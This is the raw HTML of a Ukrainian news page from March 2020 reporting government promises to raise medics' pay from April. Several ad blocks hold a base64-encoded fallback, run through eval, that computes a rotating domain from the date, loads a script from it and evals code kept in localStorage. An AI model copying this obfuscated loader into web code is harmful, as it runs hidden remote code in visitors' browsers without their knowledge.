<!DOCTYPE html><html lang="uk-ua" dir="ltr" prefix="og: http://ogp.me/ns# fb: http://www.facebook.com/2008/fbml og: http://opengraphprotocol.org/schema/"><head><link rel="preload" href="https://nikopolnews.net/media/jui/fonts/IcoMoon.woff" as="font" type="font/woff" crossorigin><meta name="theme-color" content="#31989c"><link rel="alternate" href='android-app://news.nikopolnews.net' /><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="manifest" href="/site.webmanifest"><link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5"><meta name="msapplication-TileColor" content="#31989c"><script async src="https://code.jquery.com/jquery-latest.min.js"></script><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta charset="utf-8" /><base href="https://nikopolnews.net/ukraina/40-obshchestvo/15251-z-kvitnya-ukrajinskim-medikam-zbilshat-zarplatu" /><meta name="rights" content="Источник: https://nikopolnews.net" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:description" content="З квітня Уряд збільшить зарплату українським медикам. Про це NNS повідомляє з посиланням на офіційний сайт президента України. Про підвищення оплат?" /><meta name="twitter:title" content="З квітня українським медикам збільшать зарплату" /><meta name="twitter:site" content="@newsnikopol" /><meta name="twitter:creator" content="@newsnikopol" /><meta name="twitter:image:src" content="https://nikopolnews.net/images/2020/20423235bb6dde9d0bbd9e532b9f0a84_1585646115_extra_large.jpg" /><meta name="author" content="NNS - Національна служба новин" /><meta property="og:locale" content="uk_UA" /><meta property="og:type" content="article" /><meta property="og:title" content="З квітня українським медикам збільшать зарплату" /><meta property="og:description" content="З квітня Уряд збільшить зарплату українським медикам. Про це NNS повідомляє з посиланням на офіційний сайт президента України. Про підвищення оплат?" /><meta property="og:url" content="https://nikopolnews.net/ukraina/40-obshchestvo/15251-z-kvitnya-ukrajinskim-medikam-zbilshat-zarplatu" /><meta property="og:site_name" content="NNS - Національна служба новин" /><meta property="og:image" content="https://nikopolnews.net/images/2020/20423235bb6dde9d0bbd9e532b9f0a84_1585646115_extra_large.jpg" /><meta property="og:image:width" content="758" /><meta property="og:image:height" content="506" /><meta property="og:headline" content="З квітня українським медикам збільшать зарплату" /><meta property="og:updated_time" content="2020-03-31T13:39:32+01:00" /><meta property="article:modified_time" content="2020-03-31T13:39:32+01:00" /><meta property="article:published_time" content="2020-03-31T13:39:08+01:00" /><meta property="article:section" content="Суспільство" /><meta property="news_keywords" content="праці, україни, квітня, оплати, вже, українським, шмигаль, заявив, медиків, медикам" /><meta property="article:tag" content="праці" /><meta property="article:tag" content="україни" /><meta property="article:tag" content="квітня" /><meta property="article:tag" content="оплати" /><meta property="article:tag" content="вже" /><meta property="article:tag" content="українським" /><meta property="article:tag" content="шмигаль" /><meta property="article:tag" content="заявив" /><meta property="article:tag" content="медиків" /><meta property="article:tag" content="медикам" /><meta property="article:publisher" content="https://www.facebook.com/nikopolnews" /><meta name="description" content="З квітня Уряд збільшить зарплату українським медикам. Про це NNS повідомляє з посиланням на офіційний сайт президента України. Про підвищення оплат?" /><title>З квітня українським медикам збільшать зарплату | NNS - Національна служба новин</title><link href="https://nikopolnews.net/ukraina/40-obshchestvo/15251-z-kvitnya-ukrajinskim-medikam-zbilshat-zarplatu/amp" rel="amphtml" /><link href="/templates/protostar/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" /><link href="//www.google.com" rel="dns-prefetch preconnect" /><link href="//www.google-analytics.com" rel="dns-prefetch preconnect" /><link href="//www.googletagmanager.com" rel="dns-prefetch preconnect" /><link href="//fonts.googleapis.com" rel="dns-prefetch preconnect" /><link href="//pagead2.googlesyndication.com" rel="dns-prefetch preconnect" /><link href="//googleads.g.doubleclick.net" rel="dns-prefetch preconnect" /><link href="//tpc.googlesyndication.com" rel="dns-prefetch preconnect" /><link href="//adservice.google.com" rel="dns-prefetch preconnect" /><link href="//www.youtube.com" rel="dns-prefetch preconnect" /><link href="//i.ytimg.com" rel="dns-prefetch preconnect" /><link href="//s.ytimg.com" rel="dns-prefetch preconnect" /><link href="//yt3.ggpht.com" rel="dns-prefetch preconnect" /><link href="//fonts.gstatic.com" rel="dns-prefetch preconnect" /><link href="//graph.facebook.com" rel="dns-prefetch preconnect" /><link href="//userapi.com" rel="dns-prefetch preconnect" /><link href="//vk.com" rel="dns-prefetch preconnect" /><link href="https://nikopolnews.net/index.php/components/jursspublisher/yatableau" rel="yandex-tableau-widget" /><link href="/templates/protostar/css/template.css?8460ec874e612da228459e63797b4b6c" rel="stylesheet" /> <!--[if lt IE 9]><script src="/media/jui/js/html5-uncompressed.js?8460ec874e612da228459e63797b4b6c"></script><![endif]--><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"WebPage","name":"\u0417 \u043a\u0432\u0456\u0442\u043d\u044f \u0443\u043a\u0440\u0430\u0457\u043d\u0441\u044c\u043a\u0438\u043c \u043c\u0435\u0434\u0438\u043a\u0430\u043c \u0437\u0431\u0456\u043b\u044c\u0448\u0430\u0442\u044c \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u0443","speakable":{"@type":"SpeakableSpecification","xpath":["\/html\/head\/title","\/html\/head\/meta[@name='description']\/@content"]},"url":"https:\/\/nikopolnews.net\/ukraina\/40-obshchestvo\/15251-z-kvitnya-ukrajinskim-medikam-zbilshat-zarplatu"}</script><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"NewsArticle","headline":"\u0417 \u043a\u0432\u0456\u0442\u043d\u044f \u0443\u043a\u0440\u0430\u0457\u043d\u0441\u044c\u043a\u0438\u043c \u043c\u0435\u0434\u0438\u043a\u0430\u043c \u0437\u0431\u0456\u043b\u044c\u0448\u0430\u0442\u044c \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u0443","name":"\u0417 \u043a\u0432\u0456\u0442\u043d\u044f \u0443\u043a\u0440\u0430\u0457\u043d\u0441\u044c\u043a\u0438\u043c \u043c\u0435\u0434\u0438\u043a\u0430\u043c \u0437\u0431\u0456\u043b\u044c\u0448\u0430\u0442\u044c \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u0443","description":"\u0417 \u043a\u0432\u0456\u0442\u043d\u044f \u0423\u0440\u044f\u0434 \u0437\u0431\u0456\u043b\u044c\u0448\u0438\u0442\u044c \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u0443 \u0443\u043a\u0440\u0430\u0457\u043d\u0441\u044c\u043a\u0438\u043c \u043c\u0435\u0434\u0438\u043a\u0430\u043c. \u041f\u0440\u043e \u0446\u0435 NNS \u043f\u043e\u0432\u0456\u0434\u043e\u043c\u043b\u044f\u0454 \u0437 \u043f\u043e\u0441\u0438\u043b\u0430\u043d\u043d\u044f\u043c \u043d\u0430 \u043e\u0444\u0456\u0446\u0456\u0439\u043d\u0438\u0439 \u0441\u0430\u0439\u0442 \u043f\u0440\u0435\u0437\u0438\u0434\u0435\u043d\u0442\u0430 \u0423\u043a\u0440\u0430\u0457\u043d\u0438. \u041f\u0440\u043e \u043f\u0456\u0434\u0432\u0438\u0449\u0435\u043d\u043d\u044f \u043e\u043f\u043b\u0430\u0442?","articleBody":"\r\n\r\n\u0417 \u043a\u0432\u0456\u0442\u043d\u044f \u0423\u0440\u044f\u0434 \u0437\u0431\u0456\u043b\u044c\u0448\u0438\u0442\u044c \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u0443 \u0443\u043a\u0440\u0430\u0457\u043d\u0441\u044c\u043a\u0438\u043c \u043c\u0435\u0434\u0438\u043a\u0430\u043c. \u041f\u0440\u043e \u0446\u0435 NNS \u043f\u043e\u0432\u0456\u0434\u043e\u043c\u043b\u044f\u0454 \u0437 \u043f\u043e\u0441\u0438\u043b\u0430\u043d\u043d\u044f\u043c \u043d\u0430 \u043e\u0444\u0456\u0446\u0456\u0439\u043d\u0438\u0439 \u0441\u0430\u0439\u0442 \u043f\u0440\u0435\u0437\u0438\u0434\u0435\u043d\u0442\u0430 \u0423\u043a\u0440\u0430\u0457\u043d\u0438. \u041f\u0440\u043e \u043f\u0456\u0434\u0432\u0438\u0449\u0435\u043d\u043d\u044f \u043e\u043f\u043b\u0430\u0442\u0438 \u043f\u0440\u0430\u0446\u0456 \u043c\u0435\u0434\u0438\u043a\u0456\u0432 \u0437\u0430\u044f\u0432\u0438\u0432 \u043f\u0440\u0435\u043c'\u0454\u0440-\u043c\u0456\u043d\u0456\u0441\u0442\u0440 \u0423\u043a\u0440\u0430\u0457\u043d\u0438 \u0414\u0435\u043d\u0438\u0441 \u0428\u043c\u0438\u0433\u0430\u043b\u044c, \u0439\u0434\u0435\u0442\u044c\u0441\u044f \u0443 \u043f\u043e\u0432\u0456\u0434\u043e\u043c\u043b\u0435\u043d\u043d\u0456 \u043f\u0440\u0435\u0441\u0441\u043b\u0443\u0436\u0431\u0438 \u043f\u0440\u0435\u0437\u0438\u0434\u0435\u043d\u0442\u0430 \u0423\u043a","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/nikopolnews.net\/ukraina\/40-obshchestvo\/15251-z-kvitnya-ukrajinskim-medikam-zbilshat-zarplatu"},"thumbnailUrl":"https:\/\/nikopolnews.net\/images\/2020\/20423235bb6dde9d0bbd9e532b9f0a84_1585646115_extra_large.jpg","image":{"@type":"ImageObject","url":"https:\/\/nikopolnews.net\/images\/2020\/20423235bb6dde9d0bbd9e532b9f0a84_1585646115_extra_large.jpg","height":506,"width":758},"dateCreated":"2020-03-31T13:39:08+01:00","dateModified":"2020-03-31T13:39:32+01:00","datePublished":"2020-03-31T13:39:08+01:00","interactionCount":"122","author":{"@type":"Person","name":"\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440"},"publisher":{"@type":"Organization","name":"NNS - \u041d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u043e\u0432\u0438\u043d","logo":{"@type":"ImageObject","url":"https:\/\/nikopolnews.net\/images\/thumbnails\/60060.png","height":60,"width":600}}}</script><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"WebSite","name":"NNS - \u041d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u043e\u0432\u0438\u043d","url":"https:\/\/nikopolnews.net\/","potentialAction":{"@type":"SearchAction","target":"https:\/\/nikopolnews.net\/component\/search\/{search_term_string}","query-input":"required name=search_term_string"}}</script><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"Organization","url":"https:\/\/nikopolnews.net\/","logo":"https:\/\/nikopolnews.net\/images\/jamp\/6789.jpg"}</script><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"Organization","name":"NNS - \u041d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u043e\u0432\u0438\u043d","url":"https:\/\/nikopolnews.net\/","sameAs":[["https:\/\/www.facebook.com\/groups\/nikopolnews\/","https:\/\/vk.com\/nikopolnews","https:\/\/twitter.com\/newsnikopol","https:\/\/ok.ru\/nikopolnews","https:\/\/www.youtube.com\/channel\/UCCn7a3nLMjM_jwuuzacJfOQ?view_as=subscriber","https:\/\/nikopolnews.net","https:\/\/t.me\/nikopolnews","https:\/\/play.google.com\/store\/apps\/details?id=news.nikopolnews.net"]]}</script><meta itemprop="telephone" content="+38 (095) 325-96-00"><meta itemprop="address" content="Нікополь, Дніпропетровска область"><meta property="fb:pages" content="345025019030473" /><meta property="fb:article_style" content="default"><meta property="fb:use_automatic_ad_placement" content="enable=true ad_density=default"></head><body class="site com_content view-article no-layout no-task itemid-125"><style type="text/css">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</style><div class="body" id="top"><nav class="navigation" role="navigation"><input type="checkbox" id="nav-toggle" hidden><nav class="nav"><label for="nav-toggle" class="nav-toggle" onclick><div class="men">меню</div></label><div class="fb"> <a href="https://www.facebook.com/pg/nacnews/posts/?ref=page_internal" target="_blank"> <i class="fa fa-facebook-square"></i> </a></div><div class="rss"> <a href="https://www.youtube.com/channel/UCCn7a3nLMjM_jwuuzacJfOQ?sub_confirmation=1" target="_blank"> <i class="fa fa-youtube-square"></i> </a></div><div class="header-search pull-right"><form action="/nikopol" method="post" class="form-inline" role="search"> <label for="mod-search-searchword87" class="element-invisible">Шукати...</label> <input name="searchword" id="mod-search-searchword87" maxlength="200" class="inputbox search-query input-medium" type="search" size="20" placeholder="Пошук..."> <input type="hidden" name="task" value="search"> <input type="hidden" name="option" value="com_search"> <input type="hidden" name="Itemid" value="122"></form></div><ul><li><a href="/region">Регіони</a><li><a href="/ukraina">Україна</a><li><a href="/mir">Світ</a><li><a href="/politika">Політика</a><li><a href="/obshchestvo">Суспільство</a><li><a href="/zhkkh">ЖКГ</a><li><a href="/ekonomika">Економіка</a><li><a href="/proisshestviya">Події</a><li><a href="/dosug">Дозвілля</a><li><a href="/priroda">Природа</a><li><a href="/doska-ob-yavlenij">Корисна інформація</a><li><a href="/zhiznennoe">Життєве</a></ul></nav><div class="brandsmail"> <a href="/"><img src="/templates/protostar/images/shapkasmail.png" width="auto" /></a></div></nav><header class="header" role="banner"><div id="logo-small"><script type="text/javascript">
window.onload = function(){
  document.getElementById('close').onclick = function(){
    this.parentNode.parentNode.parentNode
    .removeChild(this.parentNode.parentNode);
    return false;
  };
};	</script><div class="tizer"> <span id='close'>x</span><div id="Pw5OE9U5dOP8cKUpNoMQ" data-type="0" class="blockOfO1b2l3" ></div><script>window.RESOURCE_O1B2L3 = 'reuckvv.pro';</script><script src="//reuckvv.pro/HBsr/CV8D.js" ></script></div></div></header><div class="container"><div class="shapkaright2"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-4305834550386423" data-ad-slot="8434922785" data-ad-format="auto" data-full-width-responsive="true"></ins><script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="8434922785" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad></div><div class="shapkaright3"></div><div class="row-fluid"><main id="content" role="main" class="span9"><div id="forajax"><div id="system-message-container"></div><div class="shapkaright2"></div><div class="item-page_top_bg"></div><div class="texst"><div class="item-page"><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad><h1><div class="titletexst"> <a href="/ukraina/40-obshchestvo/15251-z-kvitnya-ukrajinskim-medikam-zbilshat-zarplatu"> З квітня українським медикам збільшать зарплату</a></div></h1><dl class="article-info"><dd class="create"> <span class="icon-calendar" aria-hidden="true"></span> <SPAN>31 бер. 2020</SPAN></dd><dd class="hits"> <span class="icon-eye-open" aria-hidden="true"></span> 122</dd><ul class="tags inline"><li class="tag-5 tag-list0" itemprop="keywords"> <a href="/component/tags/tag/obshchestvo" class="label label-info"> Суспільство </a></li></ul></dl><p style="text-align: center; font-size: 0.9em; margin-bottom: 4px;"><a href="https://play.google.com/store/apps/details?id=news.nikopolnews.net" target="_blank" rel="noopener noreferrer">Завантажте</a> мобільний додаток сайту</p><div class="shapkaright2"></div><div class="konteyner"><p><img alt="" class="ampmetaimage smartresize" src="https://nikopolnews.net/images/2020/20423235bb6dde9d0bbd9e532b9f0a84_1585646115_extra_large.jpg" /></p><div align="center"><div id="MIXADV_6637" class="MIXADVERT_NET"></div><script> 
     var node6637 = document.getElementById("MIXADV_6637");
     if( node6637 )
     {
        var script = document.createElement("script");
        script.charset = "utf-8";
        script.src = "https://m.mixadvert.com/show/?id=6637&r="+Math.random();
        node6637.parentNode.appendChild(script); 
        script.onerror = function(){
         window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ0ZWNoIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY2MzcgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjYzNy5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY2MzcucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY2MzcuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY2MzciKSkgfSwgNTAwMCk7ICA7fTsg") );
       }
     }
     </script><div class="addsensebr"><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad></div></div><p>З квітня Уряд збільшить зарплату українським медикам. Про це NNS повідомляє <a href="https://www.president.gov.ua/news/usi-obyekti-dlya-observaciyi-mayut-buti-povnistyu-gotovi-ta-60389" target="_blank">з посиланням</a> на офіційний сайт президента України. Про підвищення оплати праці медиків заявив прем'єр-міністр України Денис Шмигаль, йдеться у повідомленні пресслужби президента України.</p><div align="center"><div class="addsensebrslon"><div id="MIXADV_6615" class="MIXADVERT_NET"></div><script>
     var node6615 = document.getElementById("MIXADV_6615");
     if( node6615 )
     {
        var script = document.createElement("script");
        script.charset = "utf-8";
        script.src = "https://m.mixadvert.com/show/?id=6615&r="+Math.random();
        node6615.parentNode.appendChild(script);
        script.onerror = function(){
         window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY2MTUgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjYxNS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTY2MTUucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY2MTUuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY2MTUiKSkgfSwgNTAwMCk7ICA7fTsg") );
       }
     }
     </script></div></div><div align="center"><div class="meta"></div></div><p>Згідно інформації, отриманої NNS, керівництво держави в ході наради обговорило питання захищеності медичних працівників від інфікування коронавірусом, а також надання їм гарантій праці та відповідної оплати праці.</p><p>Нам ніколи чекати, медики вже працюють на передовій, і оплата їхньої праці має бути відповідною вже зараз, а не через тиждень чи через місяць, – зазначив Зеленський.</p><div align="center"><div class="addsensebr"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-ad-format="auto" data-full-width-responsive="true"></ins><script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad></div></div><p>В свою чергу, Шмигаль заявив, що підвищення оплати праці медиків, як і індексація пенсій, розпочнеться з квітня.</p><p><a href="https://t.me/nns_news" target="_blank"><div class="ampmetaimage smartresize" style="cursor: auto;display:inline-block;text-align:center; max-width:759px;"><img style="cursor: auto;" alt="" src="https://nikopolnews.net/images/banners/telegram_banner_thumb_medium759_0.jpg" /></div></a></p><p>Про які конкретно суми йдеться, голова уряду не уточнив.</p><div align="center"><div class="addsensebr"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-ad-format="auto" data-full-width-responsive="true"></ins><script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad></div></div><p>Раніше влада вже обіцяла тим лікарям, які безпосередньо працюватимуть з хворими на коронавірус, премії у розмірі 200% від зарплати.</p></div><div class="autor"><dd class="createdby"> Автор: Администратор</dd></div><div id="MIXADV_6625" class="MIXADVERT_NET"></div><script>
     var node6625 = document.getElementById("MIXADV_6625");
     if( node6625 )
     {
        var script = document.createElement("script");
        script.charset = "utf-8";
        script.src = "https://m.mixadvert.com/show/?id=6625&r="+Math.random();
        node6625.parentNode.appendChild(script);
        script.onerror = function(){
         window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY2MjUgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjYyNS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTY2MjUucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY2MjUuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY2MjUiKSkgfSwgNTAwMCk7ICA7fTsg") );
       }
     }
     </script><div id="M551151ScriptRootC842240"></div><script src="https://jsc.idealmedia.io/n/i/nikopolnews.net.842240.js" async></script><div class="addsensebrslon"><div id="QNxCqgITIdu00OUT1JkW" data-type="0" class="blockOfO1b2l3" ></div><script>window.RESOURCE_O1B2L3 = 'reuckvv.pro';</script><script src="//reuckvv.pro/ua/Gr.js" ></script></div><div class="shapkaright2"><div id="M433176ScriptRootC768781"><div id="M433176PreloadC768781"></div></div><script>
    (function () {
    var script = document.createElement('script');
    script.src = "//jsc.mgid.com/n/i/nikopolnews.net.768781.js?t=" + ((d = new Date()) ? '' + d.getUTCFullYear() + d.getUTCMonth() + d.getUTCDate() + d.getUTCHours() : '');
    script.async = true;
    document.body.appendChild(script);
  })();
</script><amp-ad width="600" height="600" layout="responsive" type="mgid" data-publisher="nikopolnews.net" data-widget="768781" data-container="M433176ScriptRootC768781" > </amp-ad></div><h2 class="logo-title">NNS - Національна служба новин. Останні події в Україні та світі</h2><div class="content-item"></div><div id="show"></div><div id="slidebox"> <a class="close">×</a><div id="MIXADV_6622" class="MIXADVERT_NET"></div><script type="text/javascript" src="https://m.mixadvert.com/show/?id=6622" async ></script></div><ul class="pager pagenav"><li class="next"> <a class="hasTooltip" title="Кількість випадків коронавірусу в Україні станом на 31 березня та регіони поширення" aria-label="Next article: Кількість випадків коронавірусу в Україні станом на 31 березня та регіони поширення" href="/ukraina/40-obshchestvo/15249-kilkist-vipadkiv-koronavirusu-v-ukrajini-stanom-na-31-bereznya-ta-regioni-poshirennya" rel="next"> <span aria-hidden="true">Наступна</span> <span class="icon-chevron-right" aria-hidden="true"></span> </a></li></ul></div></div></div><div class="clearfix"></div></main><div id="aside" class="span3"><div class="well hitstop"><h3 class="page-header">Останні новини</h3><div class="junewsultra hitstop"><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/ukraina/44-ekonomika/15252-podderzhka-biznesa-i-naseleniya-vo-vremya-krizisa-vr-prinyala-zakon" title="Поддержка бизнеса и населения во время кризиса: ВР приняла закон"><img src="https://nikopolnews.net/img/81x54/7/unnamed50-edcc9f9d3db86489e977d55c8ab82977.jpg" alt="Поддержка бизнеса и населения во время кризиса: ВР приняла закон" /></a></div><div class="jn-right"><h4> <a href="/ukraina/44-ekonomika/15252-podderzhka-biznesa-i-naseleniya-vo-vremya-krizisa-vr-prinyala-zakon"> Поддержка бизнеса и населения во время кризиса: ВР приняла закон              </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/ukraina/40-obshchestvo/15251-z-kvitnya-ukrajinskim-medikam-zbilshat-zarplatu" title="З квітня українським медикам збільшать зарплату"><img 